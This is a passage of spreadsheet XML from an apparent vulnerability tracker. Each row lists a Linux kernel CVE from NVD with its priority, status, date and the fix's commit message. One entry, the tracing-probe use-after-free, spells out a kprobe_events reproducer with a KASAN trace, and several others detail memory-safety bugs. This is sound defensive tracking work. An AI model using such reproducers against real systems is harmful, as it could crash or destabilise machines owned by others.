      <c r="T693" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98066</t>
        </is>
      </c>
    </row>
    <row r="694">
      <c r="A694" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B694" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C694" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98067</t>
        </is>
      </c>
      <c r="D694" s="5" t="inlineStr"/>
      <c r="E694" s="5" t="inlineStr"/>
      <c r="F694" s="5" t="inlineStr"/>
      <c r="G694" s="5" t="inlineStr"/>
      <c r="H694" s="5" t="inlineStr"/>
      <c r="I694" s="5" t="inlineStr"/>
      <c r="J694" s="5" t="inlineStr">
        <is>
          <t>tempo, go</t>
        </is>
      </c>
      <c r="K694" s="5" t="inlineStr"/>
      <c r="L694" s="5" t="inlineStr"/>
      <c r="M694" s="5" t="inlineStr"/>
      <c r="N694" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O694" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P694" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q694" s="5" t="inlineStr"/>
      <c r="R694" s="5" t="inlineStr"/>
      <c r="S694" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
erofs: disable LZ4 rolling decompression for now
LZ4 rolling decompression [1] was introduced to reduce the memory
footprint of temporary pages:
 For many cases, it is needed for users to read small data within
 a compressed extent (pcluster), either due to random small read, or
 since uptodate folios (typically order-0) cannot be reused for
 decompression again since decompression algorithm refills
 already-uptodate folios.
Rolling decompression works because LZ4 is LZ77-based and only refers
to the most recent 64 KiB of decompressed data, so in theory only a
bounded rolling window of temporary pages is needed when decompressing.
It can save a lot of temporary memory, e.g.
 601,960-byte data can be compressed into a 256k LZ4 compressed extent,
 which means it needs 146 extra pages per request in the worst case if
 rolling decompression is disabled.
However, the upstream LZ4 implementation is not under EROFS' control:
For example, the literal copy memmove() may still **copy long literals
backward** on x86 based on the address comparison even when the source
and destination ranges do not overlap (IOWs, inline decompression
doesn't need to be considered here). That breaks the rolling assumption
and makes the optimization broken.
Disable it for now to make sure the data correctness first since EROFS
is used everywhere now: The rolling window approach can be revived once
we either ensure that the official LZ4 code always copies forward for
non-overlapping ranges or maintain our own LZ4 implementation in EROFS.
The main impact is a higher runtime memory footprint; However, recent
commit 0f6273ab4637 ("erofs: add a reserved buffer pool for lz4
decompression") helps mitigate this when enabled but it's still not
perfect.
[1] https://www.usenix.org/conference/atc19/presentation/gao
    § 3.3 Decompression</t>
        </is>
      </c>
      <c r="T694" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98067</t>
        </is>
      </c>
    </row>
    <row r="695">
      <c r="A695" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B695" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C695" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98068</t>
        </is>
      </c>
      <c r="D695" s="5" t="inlineStr"/>
      <c r="E695" s="5" t="inlineStr"/>
      <c r="F695" s="5" t="inlineStr"/>
      <c r="G695" s="5" t="inlineStr"/>
      <c r="H695" s="5" t="inlineStr"/>
      <c r="I695" s="5" t="inlineStr"/>
      <c r="J695" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K695" s="5" t="inlineStr"/>
      <c r="L695" s="5" t="inlineStr"/>
      <c r="M695" s="5" t="inlineStr"/>
      <c r="N695" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O695" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P695" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q695" s="5" t="inlineStr"/>
      <c r="R695" s="5" t="inlineStr"/>
      <c r="S695" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/rds: don't let rds_conn_shutdown() consume a concurrent drop
rds_conn_shutdown() finishes by moving the path from
RDS_CONN_DISCONNECTING to RDS_CONN_DOWN, and also accepts
RDS_CONN_ERROR as the starting state of that final transition, so that
a FIN processed in softirq context during the teardown does not derail
the shutdown into a noisy error path.
But consuming that RDS_CONN_ERROR also consumes the shutdown pass that
came with it: rds_conn_path_drop() sets RDS_CONN_ERROR and then queues
cp_down_w, and a pass that starts on a path already in RDS_CONN_DOWN
is a no-op.  For the FIN case that is harmless - the socket the FIN
arrived on is the very socket the teardown just released.  It is not
harmless for a dropper that attached something to the path first.
rds_tcp_accept_one() is such a dropper.  Its path claim in
rds_tcp_accept_one_path() transitions RDS_CONN_DOWN -&gt;
RDS_CONN_CONNECTING, and a concurrent drop - a FIN on a previous
socket in softirq context, an administrative reset - can put the path
into RDS_CONN_ERROR between that claim and the state check that
follows, which accepts RDS_CONN_ERROR.  The accept then installs the
freshly accepted socket with rds_tcp_set_callbacks() while the queued
teardown - which sampled tc-&gt;t_sock before this socket existed - is
still running.  rds_connect_path_complete() fails its transition to
RDS_CONN_UP and drops the path again, queueing the pass that should
reap the socket it just installed.  If the in-flight shutdown's final
transition consumes that drop's RDS_CONN_ERROR, the queued pass finds
the path in RDS_CONN_DOWN and does nothing.  The installed socket is
never torn down: it sits established with its callbacks armed and its
rds_tcp_connection on rds_tcp_tc_list, the peer sees a connection that
nothing ever reads, and the path is wedged in RDS_CONN_DOWN until some
later event drops it again.  Reproduced with widened race windows as
an ever-growing receive queue on a socket owned by a path stuck in
RDS_CONN_DOWN, with the peer's send path wedged behind it.
Make the final transition only DISCONNECTING -&gt; DOWN.  If it fails
because the path is in RDS_CONN_ERROR, a drop raced the teardown:
cancel the reconnect timer and clear RDS_RECONNECT_PENDING - the one
piece of the skipped tail that must not be left behind - and return,
letting the pass the drop queued finish the job: it tears down
whatever attached to the path in the meantime, completes the
transition to RDS_CONN_DOWN, and re-arms the reconnect from its own
tail.
The timer quiesce in that branch matters because the racing drop does
not always queue that pass: rds_conn_path_drop() returns without
queueing when a destroy is pending - exactly the situation during a
netns teardown or module unload, when a FIN on the dying socket is
processed while rds_conn_path_destroy() flushes cp_down_w.  If the
flushed pass is the one that takes this return, no later pass exists,
and rds_conn_path_destroy() would find cp_conn_w still armed
(WARN_ON) and then free a path whose reconnect timer can still fire.
With the cancel in the branch, every exit of a shutdown pass leaves
the timer quiesced no matter which pass completes the transition.
The FIN case keeps making progress, one pass later and still without
noisy logging.  Any other state keeps today's rds_conn_path_error()
handling; no current cp_state writer can leave a DISCONNECTING path
in anything but RDS_CONN_ERROR (every other writer is a cmpxchg from
a non-DISCONNECTING state), so that branch is defensive.
On kernels without the preceding patches the same hazard exists with
the sample-based quiesce; the fix applies there equally.</t>
        </is>
      </c>
      <c r="T695" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98068</t>
        </is>
      </c>
    </row>
    <row r="696">
      <c r="A696" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B696" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C696" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98071</t>
        </is>
      </c>
      <c r="D696" s="5" t="inlineStr"/>
      <c r="E696" s="5" t="inlineStr"/>
      <c r="F696" s="5" t="inlineStr"/>
      <c r="G696" s="5" t="inlineStr"/>
      <c r="H696" s="5" t="inlineStr"/>
      <c r="I696" s="5" t="inlineStr"/>
      <c r="J696" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="K696" s="5" t="inlineStr"/>
      <c r="L696" s="5" t="inlineStr"/>
      <c r="M696" s="5" t="inlineStr"/>
      <c r="N696" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O696" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P696" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q696" s="5" t="inlineStr"/>
      <c r="R696" s="5" t="inlineStr"/>
      <c r="S696" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/rds: clear cp_flags bits individually in rds_conn_path_reset()
rds_conn_path_reset() wipes the whole flag word with a plain
cp-&gt;cp_flags = 0 store.  Every other accessor of that word uses
atomic bitops, and some of them can run concurrently with the reset:
RDS_LL_SEND_FULL is set from rds_send_xmit() and cleared from the
transport completion paths, neither of which holds anything that
excludes the shutdown worker.  A plain store racing an atomic
read-modify-write on the same word is a data race, and whichever
side loses has its update silently discarded.
Clear the two bits the reset is actually responsible for instead.
RDS_IN_XMIT and RDS_RECV_REFILL need no store at all here: they
belong to the caller, rds_conn_shutdown(), which waits for both to be
clear before calling the transport shutdown and this reset.
This also gives every bit in cp_flags a single well-defined writer
discipline, which the following patches rely on when they turn
RDS_IN_XMIT and RDS_RECV_REFILL into bit locks held across the
teardown: a blanket store mid-teardown would destroy lock ownership
that an atomic clear preserves.
Oracle UEK carries the same conversion ("net/rds: Preserve essential
connection state flags"), motivated by its asynchronous shutdown
state machine, whose progress and destroy flags must survive the
reset.  UEK's variant also clears RDS_IN_XMIT and RDS_RECV_REFILL
because there the reset runs as the final step of a teardown that
owns both bits, making those clears its unlock.  Upstream that
release belongs in rds_conn_shutdown(): once a later patch in this
series turns the two bits into locks held across the teardown, ending
ownership needs release semantics and a wake-up that a plain clear
inside the reset would not provide.
Based on Oracle UEK commit "net/rds: Preserve essential connection
state flags" by Gerd Rausch.</t>
        </is>
      </c>
      <c r="T696" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98071</t>
        </is>
      </c>
    </row>
    <row r="697">
      <c r="A697" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B697" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C697" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98072</t>
        </is>
      </c>
      <c r="D697" s="5" t="inlineStr"/>
      <c r="E697" s="5" t="inlineStr"/>
      <c r="F697" s="5" t="inlineStr"/>
      <c r="G697" s="5" t="inlineStr"/>
      <c r="H697" s="5" t="inlineStr"/>
      <c r="I697" s="5" t="inlineStr"/>
      <c r="J697" s="5" t="inlineStr"/>
      <c r="K697" s="5" t="inlineStr"/>
      <c r="L697" s="5" t="inlineStr"/>
      <c r="M697" s="5" t="inlineStr"/>
      <c r="N697" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O697" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P697" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q697" s="5" t="inlineStr"/>
      <c r="R697" s="5" t="inlineStr"/>
      <c r="S697" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/rds: use wq_has_sleeper() in release_in_xmit()
release_in_xmit() clears RDS_IN_XMIT with clear_bit_unlock() and then
checks waitqueue_active() to decide whether anyone needs waking.
clear_bit_unlock() is only a release operation: it orders the
critical section before the bit clear, but does not order the
subsequent plain load of the wait queue head after it.  The waiter
side does the mirror image - it adds itself to the wait queue and
then tests the bit.  That is the classic store-buffering pattern: the
releasing CPU can read the wait queue as empty while the waiting CPU
still reads the bit as set, so the sleeper is never woken.
The waiters are rds_conn_shutdown() and rds_tcp_reset_callbacks(),
both in uninterruptible wait_event() with no timeout.  A lost wake-up
strands the shutdown worker on its single-threaded workqueue until
some other sender releases the bit again - and on a connection that
is being torn down precisely because it failed, there may never be
another sender.
The barrier used to be there: release_in_xmit() did clear_bit()
followed by smp_mb__after_atomic() until commit 1422f28826d2 ("rds:
introduce acquire/release ordering in acquire/release_in_xmit()")
folded both into clear_bit_unlock(), which strengthened the lock
hand-off but silently dropped the full barrier the wake-up check
depends on.  The refill counterpart, release_refill() in
net/rds/ib_recv.c, still carries its smp_mb__after_atomic() for
exactly this reason.
Use wq_has_sleeper(), which is waitqueue_active() preceded by the
required full barrier.</t>
        </is>
      </c>
      <c r="T697" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98072</t>
        </is>
      </c>
    </row>
    <row r="698">
      <c r="A698" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B698" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C698" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98074</t>
        </is>
      </c>
      <c r="D698" s="5" t="inlineStr"/>
      <c r="E698" s="5" t="inlineStr"/>
      <c r="F698" s="5" t="inlineStr"/>
      <c r="G698" s="5" t="inlineStr"/>
      <c r="H698" s="5" t="inlineStr"/>
      <c r="I698" s="5" t="inlineStr"/>
      <c r="J698" s="5" t="inlineStr"/>
      <c r="K698" s="5" t="inlineStr"/>
      <c r="L698" s="5" t="inlineStr"/>
      <c r="M698" s="5" t="inlineStr"/>
      <c r="N698" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O698" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P698" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q698" s="5" t="inlineStr"/>
      <c r="R698" s="5" t="inlineStr"/>
      <c r="S698" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bonding: do not clear curr_active_slave prematurely when releasing all slaves
When releasing all slaves during bond destruction (all == true),
__bond_release_one() unconditionally clears bond-&gt;curr_active_slave to
NULL in every iteration.
If a backup slave is released before the active slave,
bond_alb_deinit_slave() triggers rlb_teach_disabled_mac_on_primary(),
which increments the active slave dev promiscuity counter and sets
bond_info-&gt;primary_is_promisc = 1.
Because bond-&gt;curr_active_slave was prematurely cleared to NULL when
releasing the backup slave, the subsequent iteration releasing the active
slave evaluates oldcurrent as NULL, so bond_change_active_slave(bond, NULL)
is skipped. Consequently, bond_alb_handle_active_change() is never called
to decrement the promiscuity counter, permanently leaking promiscuous
mode on the physical device after bond teardown.
When oldcurrent == slave, bond_change_active_slave(bond, NULL) already sets
bond-&gt;curr_active_slave to NULL. We only need to avoid selecting a new
active slave when all == true. Replace the if (all) branch with
if (!all &amp;&amp; oldcurrent == slave).</t>
        </is>
      </c>
      <c r="T698" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98074</t>
        </is>
      </c>
    </row>
    <row r="699">
      <c r="A699" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B699" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C699" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98075</t>
        </is>
      </c>
      <c r="D699" s="5" t="inlineStr"/>
      <c r="E699" s="5" t="inlineStr"/>
      <c r="F699" s="5" t="inlineStr"/>
      <c r="G699" s="5" t="inlineStr"/>
      <c r="H699" s="5" t="inlineStr"/>
      <c r="I699" s="5" t="inlineStr"/>
      <c r="J699" s="5" t="inlineStr"/>
      <c r="K699" s="5" t="inlineStr"/>
      <c r="L699" s="5" t="inlineStr"/>
      <c r="M699" s="5" t="inlineStr"/>
      <c r="N699" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O699" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P699" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q699" s="5" t="inlineStr"/>
      <c r="R699" s="5" t="inlineStr"/>
      <c r="S699" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: reject BPF_PSEUDO_FUNC reference to the main program
fixups.c:jit_subprogs() rewrites BPF_PSEUDO_FUNC loads to contain real
function addresses. This function is invoked from bpf_jit_subprogs()
only when env-&gt;subprog_cnt &gt; 1. Meaning that for any program like
below:
  int main(void *ctx) {
    void *ptr = main;
    ...
    bpf_timer_set_callback(..., ptr);
    ...
  }
The 'ptr' won't be ever converted to contain an address.
In combination with e.g. bpf_timer_set_callback() this would lead to a
function call at a bogus address.
Instead of complicating the implementation, just assume that no useful
program needs main to be a sync or async callback and reject
BPF_PSEUDO_FUNC loads for the main subprogram.</t>
        </is>
      </c>
      <c r="T699" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98075</t>
        </is>
      </c>
    </row>
    <row r="700">
      <c r="A700" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B700" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C700" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98076</t>
        </is>
      </c>
      <c r="D700" s="5" t="inlineStr"/>
      <c r="E700" s="5" t="inlineStr"/>
      <c r="F700" s="5" t="inlineStr"/>
      <c r="G700" s="5" t="inlineStr"/>
      <c r="H700" s="5" t="inlineStr"/>
      <c r="I700" s="5" t="inlineStr"/>
      <c r="J700" s="5" t="inlineStr"/>
      <c r="K700" s="5" t="inlineStr"/>
      <c r="L700" s="5" t="inlineStr"/>
      <c r="M700" s="5" t="inlineStr"/>
      <c r="N700" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O700" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P700" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q700" s="5" t="inlineStr"/>
      <c r="R700" s="5" t="inlineStr"/>
      <c r="S700" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing/probes: Fix use-after-free on field name/type of events with multiple probes
The fields of a probe-based dynamic event (kprobe, uprobe, eprobe and
fprobe events) are created in traceprobe_define_arg_fields() by handing
the probe_arg name/type strings to trace_define_field(), which only
stores the pointers without copying. Those strings are owned by the
trace_probe and are freed when that probe is removed.
An event can have several probes attached. The field list is defined
only once, by the first probe that registers the event, but it is kept
alive by any surviving sibling probe. Deleting just that first probe by
symbol -
  # primary A: fields are defined from A's args
  echo 'p:kprobes/ev vfs_read  a1=$arg1' &gt;  kprobe_events
  # append B: shares A's event call
  echo 'p:kprobes/ev vfs_write a1=$arg1' &gt;&gt; kprobe_events
  # delete only A (matched by symbol), B survives
  echo '-:kprobes/ev vfs_read'           &gt;&gt; kprobe_events
frees A's args (trace_probe_cleanup() -&gt; traceprobe_free_probe_arg()),
but trace_probe_unlink() keeps the trace_probe_event because the probe
list is not empty. The event call stays registered via B while its
fields now reference freed memory. Any field lookup then reads it, e.g.
  echo 'a1 == 1' &gt; events/kprobes/ev/filter
  BUG: KASAN: slab-use-after-free in strcmp+0xa7/0xb0
  Call Trace:
   strcmp
   trace_find_event_field
   parse_pred
   process_preds
   create_filter
   apply_event_filter
   event_filter_write
field-&gt;name references parg-&gt;name (kstrdup'd, freed with the probe) and,
for array arguments, field-&gt;type references parg-&gt;fmt (kmalloc'd, freed
with the probe) - the scalar type otherwise points at the static
fmttype rodata, which is safe.
Have traceprobe_define_arg_fields() duplicate the name and type strings
and anchor the copies on the trace_probe_event, which embeds the event
call and outlives every individual probe; trace_probe_event_free()
releases them.
The reproducer above triggers reliably; the field lookup and the delete
both run under event_mutex, so this is a dangling reference after
removal rather than a race.
The issue was found by the autokbug dynamic kernel fuzzer at Tencent
Yunding Lab.</t>
        </is>
      </c>
      <c r="T700" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98076</t>
        </is>
      </c>
    </row>
    <row r="701">
      <c r="A701" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B701" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C701" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98077</t>
        </is>
      </c>
      <c r="D701" s="5" t="inlineStr"/>
      <c r="E701" s="5" t="inlineStr"/>
      <c r="F701" s="5" t="inlineStr"/>
      <c r="G701" s="5" t="inlineStr"/>
      <c r="H701" s="5" t="inlineStr"/>
      <c r="I701" s="5" t="inlineStr"/>
      <c r="J701" s="5" t="inlineStr"/>
      <c r="K701" s="5" t="inlineStr"/>
      <c r="L701" s="5" t="inlineStr"/>
      <c r="M701" s="5" t="inlineStr"/>
      <c r="N701" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O701" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P701" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q701" s="5" t="inlineStr"/>
      <c r="R701" s="5" t="inlineStr"/>
      <c r="S701" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_conntrack_sip: fix OOB read in sip_skip_whitespace()
sip_skip_whitespace() returns dptr unchanged when its own loop
exhausts the buffer (dptr == limit), instead of NULL like its sibling
sip_follow_continuation() returns on its own "no more data" path.
ct_sip_get_header() only checks for NULL after calling it:
  dptr = sip_skip_whitespace(dptr, limit);
  if (dptr == NULL)
          break;
  if (*dptr != ':' || ++dptr &gt;= limit)
          break;
so a recognized header name followed only by spaces/tabs running to
the exact end of the SIP payload, with no colon, makes the very next
statement read one byte past the buffer.
Make both "no more data" outcomes return NULL, matching the
convention sip_follow_continuation() already uses and that both
existing callers already check for.</t>
        </is>
      </c>
      <c r="T701" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98077</t>
        </is>
      </c>
    </row>
    <row r="702">
      <c r="A702" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B702" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C702" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98078</t>
        </is>
      </c>
      <c r="D702" s="5" t="inlineStr"/>
      <c r="E702" s="5" t="inlineStr"/>
      <c r="F702" s="5" t="inlineStr"/>
      <c r="G702" s="5" t="inlineStr"/>
      <c r="H702" s="5" t="inlineStr"/>
      <c r="I702" s="5" t="inlineStr"/>
      <c r="J702" s="5" t="inlineStr"/>
      <c r="K702" s="5" t="inlineStr"/>
      <c r="L702" s="5" t="inlineStr"/>
      <c r="M702" s="5" t="inlineStr"/>
      <c r="N702" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O702" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P702" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q702" s="5" t="inlineStr"/>
      <c r="R702" s="5" t="inlineStr"/>
      <c r="S702" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipvs: fix reversed sequence option serialization
hton_seq() expects the host-order source first and the unaligned
network-order destination second. The version 1 sync sender passes these
arguments in reverse for both sequence blocks. This leaves 24 bytes of the
kmalloc-backed message unwritten. It may disclose stale heap data and
replace the live connection sequence state with values read from the
buffer.
Pass the connection sequence state as the source and the message payload as
the destination for both blocks.</t>
        </is>
      </c>
      <c r="T702" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98078</t>
        </is>
      </c>
    </row>
    <row r="703">
      <c r="A703" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B703" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C703" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98079</t>
        </is>
      </c>
      <c r="D703" s="5" t="inlineStr"/>
      <c r="E703" s="5" t="inlineStr"/>
      <c r="F703" s="5" t="inlineStr"/>
      <c r="G703" s="5" t="inlineStr"/>
      <c r="H703" s="5" t="inlineStr"/>
      <c r="I703" s="5" t="inlineStr"/>
      <c r="J703" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K703" s="5" t="inlineStr"/>
      <c r="L703" s="5" t="inlineStr"/>
      <c r="M703" s="5" t="inlineStr"/>
      <c r="N703" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O703" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P703" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q703" s="5" t="inlineStr"/>
      <c r="R703" s="5" t="inlineStr"/>
      <c r="S703" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: zstd: fix lost wakeup when waiting for a workspace
A writer can sleep forever in zstd_get_workspace() even though a workspace
is free.  When zstd_alloc_workspace() fails, the task is queued on
zwsm-&gt;wait and schedules unconditionally, never re-testing the pool.
zstd_put_workspace() publishes the workspace and then calls cond_wake_up(),
which only wakes when a sleeper is already visible, so a workspace returned
between the failed allocation and prepare_to_wait() wakes nobody.  The
window is wide: zstd_alloc_workspace() goes through kvmalloc() and may
enter reclaim.
Only a max level workspace triggers the wakeup and one is deliberately kept
allocated as the fallback every waiter waits for, so once its wakeup is
lost the writer stays in TASK_UNINTERRUPTIBLE until some other task happens
to return one.  Re-check the pool after prepare_to_wait() has published the
waiter, and use the workspace if one turned up.</t>
        </is>
      </c>
      <c r="T703" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98079</t>
        </is>
      </c>
    </row>
    <row r="704">
      <c r="A704" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B704" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C704" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98080</t>
        </is>
      </c>
      <c r="D704" s="5" t="inlineStr"/>
      <c r="E704" s="5" t="inlineStr"/>
      <c r="F704" s="5" t="inlineStr"/>
      <c r="G704" s="5" t="inlineStr"/>
      <c r="H704" s="5" t="inlineStr"/>
      <c r="I704" s="5" t="inlineStr"/>
      <c r="J704" s="5" t="inlineStr"/>
      <c r="K704" s="5" t="inlineStr"/>
      <c r="L704" s="5" t="inlineStr"/>
      <c r="M704" s="5" t="inlineStr"/>
      <c r="N704" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O704" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P704" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q704" s="5" t="inlineStr"/>
      <c r="R704" s="5" t="inlineStr"/>
      <c r="S704" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: do not force reloc root creation during qgroup_account_snapshot()
[BUG]
When running btrfs/252 with quota enabled through MKFS_OPTIONS="-O quota",
it has a high chance to trigger the following kernel warning and flips
the fs RO:
  BTRFS info (device dm-2): relocating block group 30408704 flags metadata|dup
  ------------[ cut here ]------------
  WARNING: fs/btrfs/extent-tree.c:879 at lookup_inline_extent_backref+0x74b/0x960 [btrfs], CPU#4: btrfs/2173
  CPU: 4 UID: 0 PID: 2173 Comm: btrfs Not tainted 7.2.0-rc6-custom+ #457 PREEMPT(full)  3adc6528fb66f7a55fe1095385818e742f200aab
  Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS unknown 02/02/2022
  RIP: 0010:lookup_inline_extent_backref+0x74b/0x960 [btrfs]
  Call Trace:
   &lt;TASK&gt;
   insert_inline_extent_backref+0x7c/0x160 [btrfs 32f09462c54d9c922fca74a3e4866f4aa7737b72]
   __btrfs_inc_extent_ref+0xa9/0x270 [btrfs 32f09462c54d9c922fca74a3e4866f4aa7737b72]
   __btrfs_run_delayed_refs+0x4af/0x11c0 [btrfs 32f09462c54d9c922fca74a3e4866f4aa7737b72]
   btrfs_run_delayed_refs+0x9d/0xf0 [btrfs 32f09462c54d9c922fca74a3e4866f4aa7737b72]
   create_pending_snapshot+0x39d/0xf00 [btrfs 32f09462c54d9c922fca74a3e4866f4aa7737b72]
   create_pending_snapshots+0x9b/0xc0 [btrfs 32f09462c54d9c922fca74a3e4866f4aa7737b72]
   btrfs_commit_transaction+0x280/0xeb0 [btrfs 32f09462c54d9c922fca74a3e4866f4aa7737b72]
   prepare_to_relocate+0x147/0x200 [btrfs 32f09462c54d9c922fca74a3e4866f4aa7737b72]
   relocate_block_group+0x6b/0x5e0 [btrfs 32f09462c54d9c922fca74a3e4866f4aa7737b72]
   btrfs_relocate_block_group+0x92c/0x2380 [btrfs 32f09462c54d9c922fca74a3e4866f4aa7737b72]
   btrfs_relocate_chunk+0x3f/0x1a0 [btrfs 32f09462c54d9c922fca74a3e4866f4aa7737b72]
   btrfs_balance+0xa2c/0x19c0 [btrfs 32f09462c54d9c922fca74a3e4866f4aa7737b72]
